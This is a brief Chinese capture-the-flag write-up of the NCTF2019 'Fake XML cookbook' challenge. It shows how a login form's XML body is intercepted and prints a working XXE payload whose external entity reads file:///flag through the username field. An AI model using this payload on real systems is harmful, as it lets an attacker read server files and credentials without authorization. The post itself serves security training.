[NCTF2019]Fake XML cookbook
[NCTF2019]Fake XML cookbook
打卡环境是一个登录页面,根据题目名字就能看出来和xml有关,和xml有关的那就是注入,brup抓包看下数据包,结果如下:
发现username和password是xml格式,尝试XML外部实体注入得到flag
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
<!ENTITY test SYSTEM "file:///flag">
]>
<user><username>&test;</username><password>1</password></user>
关于XML注入内容的补充:https://xz.aliyun.com/t/6887#toc-0
浙公网安备 33010602011771号